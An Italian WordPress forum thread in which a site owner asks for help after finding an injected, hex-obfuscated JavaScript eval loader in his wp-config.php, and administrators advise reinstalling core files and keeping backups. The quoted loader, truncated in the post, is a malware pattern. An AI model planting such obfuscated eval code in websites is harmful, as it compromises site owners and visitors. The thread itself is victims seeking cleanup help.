Home › Forum › Problemi Vari con WP › Sito attaccato da hacker: che fare?
-
AutorePost
-
-
12 Ottobre 2010 alle 0:23 #15259FabDMPartecipante
ciao,
ho un sito su piattaforma WordPress che gestisco e ho scoperto che sono stato vittima di hackers. Non potevo più accedervi a ricevevo un messaggio che diceva:
Parse error: syntax error, unexpected ‘<‘ in /home/mhd-01/wwww.xxxxx-yyyyyy.com/htdocs/wp-config.php on line 93.
Via FTP ho controllato il file wp-config.php ed ho trovato questo script:
<script type=’text/javascript’>
var t=””;var arr=”646f63756d656e742e…2729″;for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);
</script>
L’ho cancellato e sono riuscito a visualizzare di nuovo il mio sito ma il pannello di controllo di WordPress presenta ancora dei problemi, lo visualizzo male, con una grafica sconclusionata per cui credo che il problema non sia risolto.
Ho effettuato la procedura di pulizia indicata qui e, log di hijackthis a parte da analizzare, non mi pare ci sia nulla di particolare nel mio pc. O meglio, prima Antivir mi ha rilevato un Trojan che è stato però eliminato adesso.
Se però il mio pc fosse davvero pulito ora credo che dovrei visualizzare il pannello di controllo di WordPress correttamente e invece non è cosà¬.
Esiste un modo per vedere se nel mio sito è stato inserito qualche altro script da altre parti? Esiste qualche programma per analizzare il mio sito nello specifico invece che il mio pc?
Grazie in anticipo, ciao!
P.S.
Il servizio assistenza del mio hosting mi ha risposto cosà¬: “probabilmente ha qualche script nel sito che ha dei BUG che hanno consentito la modifica della pagina. Consigliamo di fare controlli in tal senso.” Appunto, come posso fare controlli in tal senso??
P.S.2
ho appena riscontrato lo stesso problema in un altro sito che ho e usavo come prova.
Siccome ho anche altri siti oltre a questi 2, notavo il fatto che, per ora, ho riscontrato questo problema con 2 blog WordPress che hanno lo stesso hosting service. Un altro blog WordPress che ho, con un altro hosting, per ora non presenta alcun problema di questo tipo.
Non so se c’entri l’hosting comunque ma volevo riportarlo.
Spero che qualcuno mi sappia dare una mano a capire .
Sono tutti script jva..che devo fare, disinstallare java??
Entrambe le versioni WP sono 3.01.
-
12 Ottobre 2010 alle 10:17 #77627BorgPartecipante
Perchè non provi semplicemente a ripristinare wordpress reinstallandolo?
-
12 Ottobre 2010 alle 11:53 #77632FabDMPartecipante
Perchè non provi semplicemente a ripristinare wordpress reinstallandolo?
In effetti potrebbe essere una soluzione ma stupidamente non ho un backup del sito.
E’ un sito recente ma ci ho già fatto su un po’ di lavoro e proprio quando stavo per effettuare il primo backup sono iniziati
i problemi cosଠsono rimasto senza.
Se dovessi riuscire a farlo ora non rischierei di portarmi dietro i vari malware?
-
13 Ottobre 2010 alle 13:19 #77656FabDMPartecipante
quindi mai nessuno ha avuto il sito attaccato da hacker? Sono uno dei pochi sfigati?
-
13 Ottobre 2010 alle 13:25 #77658wollyAmministratore del forum
gli up non sono ammessi e no, non sei stato l’unico, cercando nel forum troverai decine di 3d che spiegano come muoversi per ripulire i vari attacchi.
-
13 Ottobre 2010 alle 13:26 #77659SteveAglAmministratore del forum
SI certo molti.. ma di solito si ripristina il sito da un backup… dire dove metter mano per pulirlo a manina esula dalle “possibilità ” di un forum visto che potrebsti avere l’infezione sparsa su più file et cetc… avere un backup aggiornato è FODAMENTALE SEMPRE. Ripristinare i file di WP (temi e plugin esclusi) non richiede il backup… i plugin idem.. il tema se lo hai modificato.. allora son problemi… i file che hai caricato (immagini etc) li hai un wp-content/uploads e li puoi copiare senza problemi dubito li ci sia roba infetta…
-
13 Ottobre 2010 alle 13:48 #77661FabDMPartecipante
chiedo cusa per l’up, io ho cercato prima di postare. Evidentemente l’ho fatto male.
Grazie SteveAgl, il mio errore principale è stato quello di non avere eseguito un backup precedentemente.
Seguo i tuoi consigli e vedo se riesco a risolvere.
Grazie
-
13 Ottobre 2010 alle 15:06 #77669FabDMPartecipante
chiedo scusa, non vuole essere un up questo ma non compare da nessuna parte il link “modifica” attorno al mio ultimo post.
Vlevo sapere, siccome il sito sembra essere correttamente online ma il pannello di controllo è chiaramente alterato (la grafica è sconclusionata e non riesco ad accedere alle funzioni) come posso fare, non avendo neanche un backup da reinstallare?
grazie
-
13 Ottobre 2010 alle 15:21 #77671SteveAglAmministratore del forum
reinstalalre i file di WP… sovrascrivendoli via FTP…. come se aggiornassi il blog segui le istruzioni su come aggiornare un blog sul nostro wiki o nella pagina download
-
13 Ottobre 2010 alle 15:53 #77673FabDMPartecipante
ok…non ne vengo a capo..ho provato sovrascrivendo i file di wordpress via ftp su quello corrotti.
E’ venuto fuori un casino.. All’indirizzo del sito in questione continuo a vedere una pagina bianca mentre se vado nel pannello di controllo WP per effettuare l’accesso, vengo direzionato all’altro mio blog WP corrotto….
Non ne posso più, se qualcuno mi sa dire cosa fare per venirne a capo, anche a costo di perdere tutto il lavoro fatto finora…
Sono nero, vorrei poter avere tra le mani chi si diverte a rovinare il lavoro altrui….
Scusate lo sfogo..un saluto
-
13 Ottobre 2010 alle 16:02 #77675SteveAglAmministratore del forum
non avrai sovrascritto i file correttamente, meglio cancellare i file (come spiegato nelle guide, soloq uelli indicati es la dir wp-conte e il wp-config.php no) e poi ricaricare i file… usa un buon programma FTP filezilla in primis…
Altrimenti solo un intervento di un professionista.. magari in 1 oretta lo sistema…
-
13 Ottobre 2010 alle 16:40 #77676FabDMPartecipante
ecco allora che ho sbagliato….
uso filezilla ma ho sovrascritto tutti i file. Bastava ragionarci un attimo per capire che non dovevo fare cosà¬..
Un po’ la totale inesperienza in situazioni del genere un po’ la rabbia del momento ed ho fatto il danno.
Non so cosa farò, vorrei almeno recuperare uno dei 2 siti..spero di riuscirci.
Grazie SteveAgl dell’aiuto, gentilissimo
-
-
AutorePost
- Devi essere connesso per rispondere a questo topic.